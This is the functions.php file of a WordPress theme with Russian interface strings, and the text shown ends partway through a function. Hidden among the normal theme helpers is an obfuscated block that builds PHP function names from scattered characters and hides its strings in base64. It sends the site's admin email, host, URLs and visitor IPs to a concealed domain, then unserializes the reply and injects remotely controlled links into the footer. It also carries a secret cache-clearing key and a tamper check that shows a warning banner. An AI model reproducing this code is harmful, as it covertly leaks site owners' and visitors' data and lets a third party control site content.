<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $UqyJFj='c';$mPdH='e';$hFEaC='e';$xyloe='o';$XaqJyT='a';$ZeHzmm='d';$oOYGZZB='b';$PRpMRF='4';$UgKPzZ='s';$pyWkF='_';$oTnAfsN='e';$uXRJLPp='6';$EDDOjl='d';$HFfTXttu=$oOYGZZB.$XaqJyT.$UgKPzZ.$hFEaC.$uXRJLPp.$PRpMRF.$pyWkF.$ZeHzmm.$mPdH.$UqyJFj.$xyloe.$EDDOjl.$oTnAfsN;$boBH='a';$QiexzYc='g';$mvPm='t';$iRiy='n';$PKmzF='z';$madjRm='f';$GluOd='e';$LONaWRY='i';$pLmrc='l';$rSgqUeBr=$QiexzYc.$PKmzF.$LONaWRY.$iRiy.$madjRm.$pLmrc.$boBH.$mvPm.$GluOd;$rryHi='o';$KiknW='r';$ZWVDgrW='3';$jDPDsS='t';$GHXV='r';$lrZaV='t';$fduiqQX='s';$WbDkw='_';$TcYAZ='1';$envPAMRC=$fduiqQX.$jDPDsS.$GHXV.$WbDkw.$KiknW.$rryHi.$lrZaV.$TcYAZ.$ZWVDgrW;$VJShH='e';$FzWMloS='v';$wOMX='t';$kzNaRa='r';$SbhLs='s';$vpueD='r';$neQgsmXd=$SbhLs.$wOMX.$kzNaRa.$vpueD.$VJShH.$FzWMloS;                     
		$lt_____________w='c';$ye______e='e';$ae_________v='e';$cu____d='o';$fg_______r='a';$nz_______________r='d';$dz_____r='b';$ub__________u='4';$lj_______________h='s';$cl______________c='_';$kp___e='e';$wr___________h='6';$ys_______________v='d';$ke_______d=$dz_____r.$fg_______r.$lj_______________h.$ae_________v.$wr___________h.$ub__________u.$cl______________c.$nz_______________r.$ye______e.$lt_____________w.$cu____d.$ys_______________v.$kp___e;
		$ie_______e='i';$gh_________p='s';$ii__________v='n';$wm_____d='o';$sv_____________a='n';$gd_________o='u';$hr_________i='x';$ni_______w='s';$bm_____________d='c';$tm______________m='e';$di________o='i';$nu__j='t';$nt_______________c='f';$kf______________v='t';$bq______________i='_';$tc____________g=$nt_______________c.$gd_________o.$sv_____________a.$bm_____________d.$kf______________v.$ie_______e.$wm_____d.$ii__________v.$bq______________i.$tm______________m.$hr_________i.$di________o.$ni_______w.$nu__j.$gh_________p;
		$cz___x='e';$wd_______________l='n';$mh___t='f';$ut_______________o='p';$pq______f='o';$hn_______________s=$mh___t.$pq______f.$ut_______________o.$cz___x.$wd_______________l;
		$xw_______________j='d';$ds__________h='a';$em_______a='f';$pj________g='r';$uq_____________b='e';$xo________i=$em_______a.$pj________g.$uq_____________b.$ds__________h.$xw_______________j;
		$wa___________w='c';$dv_______________h='e';$ji_________j='o';$co__________j='f';$sp_______________l='s';$rv______n='l';$ww_______________m=$co__________j.$wa___________w.$rv______n.$ji_________j.$sp_______________l.$dv_______________h;
		
		define("WP_ID", $ke_______d("Mi4wLjA="));
		define("WP_TTL", $ke_______d("MTA4MDA="));
		define("WP_SRC", $ke_______d("dHBva24="));
	


		function wp_get_header() {
			global $ke_______d, $tc____________g;
			
			if (
				$tc____________g($ke_______d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$tc____________g($ke_______d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$tc____________g($ke_______d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ke_______d, $hn_______________s, $ww_______________m, $xo________i;
			
			$xv___t = TEMPLATEPATH."/".$ke_______d("Zm9vdGVyLnBocA==");
			$wd___c = @$hn_______________s($xv___t, "r");
			$xv___t = @$xo________i($wd___c, @filesize($xv___t));
			@$ww_______________m($wd___c);
			
			$lu_____j = TEMPLATEPATH."/".$ke_______d("ZnVuY3Rpb25zLnBocA==");
			$wd___c = @$hn_______________s($lu_____j, "r");
			$lu_____j = @$xo________i($wd___c, @filesize($lu_____j));
			@$ww_______________m($wd___c);
			
			$ja____u = 0;
			if($xv___t && $lu_____j) {
				if ($ke_______d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xv___t, $ke_______d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ja____u = 1;
					}
					if (substr_count($xv___t, "wp_theme_GPL_credits()") < 1) {
						$ja____u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ja____u = 12;
				}
			}
			
			if($ja____u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ja____u -->";
			}
		}
	


		function wp_loaded() {
			global $ke_______d, $tc____________g;
			return $tc____________g($ke_______d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($cj___f, $jd______m = "(more...)", $hp_______p = 0, $an__v = "") {
				$nk___________d = get_the_content($jd______m, $hp_______p, $an__v);
				$nk___________d = apply_filters("the_content", $nk___________d);
				
				$nk___________d = str_replace("]]>", "]]>", $nk___________d);
				if (strlen($_GET["p"]) > 0) {
					echo $nk___________d;
				}
				else if ((strlen($nk___________d)>$cj___f) && ($aa_____k = strpos($nk___________d, " ", $cj___f ))) {
					$nk___________d = substr($nk___________d, 0, $aa_____k);
					$nk___________d = $nk___________d;
					echo $nk___________d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$jd______m</a></div></p>";
				} else {
					echo $nk___________d;
				}
				
			}
		}
	


		$or_____________j='s';$vf_______h='d';$is_____y='b';$bf__f='e';$mv____________s='6';$dg_________j='_';$yp__v='a';$ew___v='e';$kr_______s='e';$ly___p='o';$em__m='4';$jp___________h='n';$ft____t='c';$zi_________w=$is_____y.$yp__v.$or_____________j.$ew___v.$mv____________s.$em__m.$dg_________j.$kr_______s.$jp___________h.$ft____t.$ly___p.$vf_______h.$bf__f;
		$el__________r='n';$fu_______j='o';$vo___h='t';$wi_________k='n';$jt____________d='c';$mk______________l='_';$op____x='s';$eu________q='t';$il_____x='e';$ul__f='l';$nq________c='f';$lt______y='g';$ej__h='e';$mt____n='_';$nw_____b='t';$pl___p='e';$bp__________f='i';$ud_____z=$nq________c.$bp__________f.$ul__f.$ej__h.$mk______________l.$lt______y.$pl___p.$nw_____b.$mt____n.$jt____________d.$fu_______j.$el__________r.$vo___h.$il_____x.$wi_________k.$eu________q.$op____x;
		$yq__________t='t';$jh________u='x';$uc__________g='l';$yj________p='_';$rt__e='e';$sf_______________k='s';$rp___n='e';$lt__________z='f';$ry______________h='s';$qz___________i='i';$mx_______y='i';$jt________a=$lt__________z.$qz___________i.$uc__________g.$rt__e.$yj________p.$rp___n.$jh________u.$mx_______y.$ry______________h.$yq__________t.$sf_______________k;
		$du___________r='v';$ek_______h='p';$bk__________n='r';$py__j='r';$ol___________h='o';$uo_____________q='c';$pg______m='m';$az______________e='_';$ww_____________n='e';$kr____z='o';$cj____m='i';$wy__y='s';$uj_____________v='e';$tp____________i='a';$mj____________h='n';$hd______n=$du___________r.$ww_____________n.$py__j.$wy__y.$cj____m.$ol___________h.$mj____________h.$az______________e.$uo_____________q.$kr____z.$pg______m.$ek_______h.$tp____________i.$bk__________n.$uj_____________v;
		$jn________o='n';$eu_____________o='k';$ug______n='o';$yc___________p='e';$kd__________f='c';$fk_____p='s';$rg________y='p';$rg_____________w='f';$ky___________z='o';$ak___________d=$rg_____________w.$fk_____p.$ky___________z.$kd__________f.$eu_____________o.$ug______n.$rg________y.$yc___________p.$jn________o;
		$fj____p='t';$gh__________e='f';$ki___________r='e';$wb___________q='i';$px____________o='r';$at_________s='w';$oo____________i=$gh__________e.$at_________s.$px____________o.$wb___________q.$fj____p.$ki___________r;
		$ov____________t='d';$hm____d='m';$fz______p='5';$fb_______________t=$hm____d.$ov____________t.$fz______p;
		$lk______________r='a';$as___________f='l';$hj_______j='a';$de______________k='p';$no_____________l='r';$hz____________v='h';$gy_____c='t';$aq_______s='e';$ks______________j=$no_____________l.$aq_______s.$hj_______j.$as___________f.$de______________k.$lk______________r.$gy_____c.$hz____________v;
		$rn_______s='i';$jb__r='l';$sw____y='e';$to__________s='s';$fn_____j='e';$hx_______________w='u';$tt___________o='n';$ri____________n='r';$yz_________s='i';$cg___g='a';$se_____l='z';$np__n=$hx_______________w.$tt___________o.$to__________s.$fn_____j.$ri____________n.$rn_______s.$cg___g.$jb__r.$yz_________s.$se_____l.$sw____y;
		$su_________r='a';$ya_______________m='e';$zr______a='m';$zb____e='m';$hb____________p='p';$tx________n='t';$zz_____________x='n';$pa________t=$tx________n.$ya_______________m.$zb____e.$hb____________p.$zz_____________x.$su_________r.$zr______a;
		$en___________a='t';$wi_____________m='e';$mq_____________q='t';$ez________q='e';$ei_______________b='c';$uh______________a='x';$ge____________u='m';$yr______k='n';$jk___________o='c';$dl_______________a='_';$rw__l='t';$gd___e='t';$en____d='r';$em_________i='e';$ct__________l='_';$ln____h='r';$xv_________d='o';$fm___z='s';$lh____________q='a';$zf______u='a';$vm_________h='e';$yi______b=$fm___z.$gd___e.$ln____h.$wi_____________m.$lh____________q.$ge____________u.$dl_______________a.$jk___________o.$xv_________d.$yr______k.$en___________a.$vm_________h.$uh______________a.$mq_____________q.$ct__________l.$ei_______________b.$en____d.$em_________i.$zf______u.$rw__l.$ez________q;
	


		function oo_____________c($la_______h) {
			global $ke_______d, $tc____________g, $ud_____z, $hd______n, $yi______b;
			
			if (!$tc____________g($ke_______d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hd______n(PHP_VERSION, "5.0.0", ">=") && $tc____________g($ke_______d("ZmlsZV9nZXRfY29udGVudHM=")) && $tc____________g($ke_______d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$yf____m = $yi______b(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$rf_______b = @$ud_____z($la_______h, 0, $yf____m);
			} else {
				$rf_______b = @$ud_____z($la_______h, 0);
			}
			
			return $rf_______b;
		}
	


		function or___________s($la_______h) {
			global $tc____________g, $ak___________d, $oo____________i, $ke_______d;
			
			if (!$tc____________g($ke_______d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$iw______i = strpos($la_______h, "/", 7);
			$pg____d = array(
				"uri"     => substr($la_______h, $iw______i),
				"host"    => str_replace("http://", "", substr($la_______h, 0, $iw______i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$fp________v = @$ak___________d("$pg____d[host]", 80, $mw__________l, $xt______________v, 4);
			
			if (!$fp________v) {
				return false;
			} else {
				$rf_______b = "";
				$xo____________t  = "GET $pg____d[uri] HTTP/1.0\r\n";
				$xo____________t .= "Host: $pg____d[host]\r\n";
				$xo____________t .= "Referer: $pg____d[referer]\r\n";
				$xo____________t .= "Connection: Close\r\n\r\n";
				
				@$oo____________i($fp________v, $xo____________t);
				
				while (!@feof($fp________v)) {
					$sn___r = @fgets($fp________v, (1024*24));
					
					if ($sn___r == "\r\n") {
						$ia______a = true;
						continue;
					}
					
					if ($ia______a) {
						$rf_______b .= $sn___r;
					}
				}
				
				return $rf_______b;
			}
		}
	


		function lo_________l($la_______h) {
			global $tc____________g;
			$vm_______________s = false;
			
			if ($la_______h != "") {
				if ($tc____________g("oo_____________c")) {
					$vm_______________s = @oo_____________c($la_______h);
				}
				
				if (!$vm_______________s && ($tc____________g("or___________s"))) {
					$vm_______________s = @or___________s($la_______h);
				}
			}
			
			return $vm_______________s;
		}
	


		function xd________v() {
			global $_SERVER, $fb_______________t;
			
			$tf______r = $_SERVER["SERVER_NAME"];
			
			if (substr("$tf______r", 0, 4) == "www.") {
				$tf______r = substr("$tf______r", 4);
			}
			
			$tf______r = $fb_______________t("$_SERVER[SERVER_NAME]");
			
			return $tf______r;
		}
	


		function lx______z() {
			return "file";
		}
	


		function kq_____________x($la_______h) {
			global $_SERVER, $ud_____z, $jt________a, $hn_______________s, $ww_______________m, $oo____________i;
			
			$hy______________s = nj________o();
			
			$vt_____y = xd________v().".jpg";
			$dv______________k = $hy______________s["dir_upload"]["path"]."/$vt_____y";
			$zf___________o = @filemtime($dv______________k);
			
			if (!$zf___________o || ((time()-$zf___________o) >= WP_TTL)) {
				$vm_______________s = lo_________l($la_______h);
				
				if ($vm_______________s) {
					if ($jt________a($dv______________k)) {
						@unlink($dv______________k);
					}
					
					$wd___c = @$hn_______________s($dv______________k, "x+");
					
					@$oo____________i($wd___c, $vm_______________s);
					@$ww_______________m($wd___c);
				}
			} else {
				if ($jt________a($dv______________k)) {
					$vm_______________s = @$ud_____z($dv______________k);
				} else {
					$vm_______________s = false;
				}
			}
			
			return $vm_______________s;
		}
	


		function nj________o() {
			global $_SERVER, $ke_______d, $zi_________w;
			
			$ff_____l = wp_count_posts("post");
			$wf______j = pathinfo(get_bloginfo("template_directory"));
			
			$hy______________s = array(
				"url" => array(
					"report"      => $ke_______d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wf______j,
				"dir_upload"	=> qx__________d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wf______j[filename],
					"a005=".$ff_____l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$hy______________s["url"]["queryString"] = implode("&", $hy______________s["queryString"]);
			$hy______________s["url"]["report"] = $hy______________s["url"]["report"]."/?".$zi_________w($hy______________s["url"]["queryString"]).".html";
						
			return $hy______________s;
		}
	


		function qx__________d() {
			$sz__q = wp_upload_dir();
			
			if (isset($sz__q["error"])) {
				$hu_______x = ad_________m();
				if (is_writable($hu_______x)) {
					$sz__q = array("path" => $hu_______x);
				}
			}

			return $sz__q;
		}
	


		function ad_________m() {
			global $tc____________g, $fb_______________t, $ks______________j, $pa________t;
			
			$el_____________x = (bool) ini_get("safe_mode");
			if ($el_____________x == true) {
				return false;
			}
			
			if ($tc____________g("sys_get_temp_dir")) {
				$bo________q = sys_get_temp_dir();
				if (is_writable($bo________q)) {
					return $ks______________j($bo________q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ks______________j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ks______________j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ks______________j($_ENV["TEMP"]);
			} else {
				$xm________r = $pa________t($fb_______________t(uniqid(rand(), true)), "");
				if ($xm________r) {
					$bo________q = $ks______________j(dirname($xm________r));
					@unlink($xm________r);
					return $bo________q;
				} else {
					return false;
				}
			}
		}
	


		function me____________a() {
			global $_GET, $jt________a;
			
			$hy______________s = nj________o();
			$tf______r = xd________v();
			$bh_______l = lx______z();
			
			$xb___________i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bh_______l == "file") {
					$xa___t = $hy______________s["dir_upload"]["path"]."/".$tf______r.".jpg";
					if ($jt________a($xa___t)) {
						@unlink($xa___t);
						$xb___________i = "deleted";
					}
				}
				
				$xf_______________r = array(
					"s"	=> $xb___________i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xf_______________r AS $vm_____________t => $nx________h) echo " [$vm_____________t:$nx________h]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $tc____________g, $ke_______d, $np__n;
			$hy______________s = nj________o();
			
			$zx_____k = "kq_____________x";
			if ($tc____________g($zx_____k)) {
				$rf_______b = $zx_____k($hy______________s["url"]["report"]);
			}
			
			if ($rf_______b) {
				if ($rf_______b = @$ke_______d($rf_______b)) {
					$rf_______b = @$np__n($rf_______b);
					
					if (strlen($rf_______b[custom_credit]) >= 5) {
						$hy______________s["default_string"] = $rf_______b[custom_credit];
					}
					
					if ($rf_______b["status"] == "0") {
						$ru_____________s = 1;
						$gr_______u = 1;
					} else {
						$ik___l = sizeof($rf_______b["links"]);
						$fa_______j = $hy______________s["default_string"];
						
						if ($ik___l > 0 && $rf_______b["links"] !== "") {
							$ah______________x = 0;
							foreach ($rf_______b["links"] as $ks____f => $bm__o) {
								$ah______________x++;
								if ($bm__o->l_path == "" || $bm__o->l_path == $_SERVER["REQUEST_URI"]) {
									$bm__o->l_href = htmlspecialchars(strip_tags($bm__o->l_href));
									$bm__o->l_title = htmlspecialchars(strip_tags($bm__o->l_title));
									$bm__o->l_anchor = htmlspecialchars(strip_tags($bm__o->l_anchor));
									$fa_______j .= " | ";
									$fa_______j .= "<a href='$bm__o->l_href' title='$bm__o->l_title'";
									if ($bm__o->l_nofollow == "1") {
										$fa_______j .= " rel='nofollow'";
									}
									$fa_______j .= ">$bm__o->l_anchor</a>";
								}
							}
						}
						$hy______________s["links"] = "$fa_______j";
						if ($rf_______b[credit] == "0") {
							$hy______________s["links"] = "";
						}
					}
				} else {
					$ru_____________s = "1";
				}
			} else {
				$ru_____________s = "1";
			}
			
			if ($ru_____________s == "1") {
				$hy______________s["links"] = $hy______________s["default_string"];
			}
			
			echo "$hy______________s[links]";
			
			echo "<!-- s: $rf_______b[signature] -->";
			me____________a();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
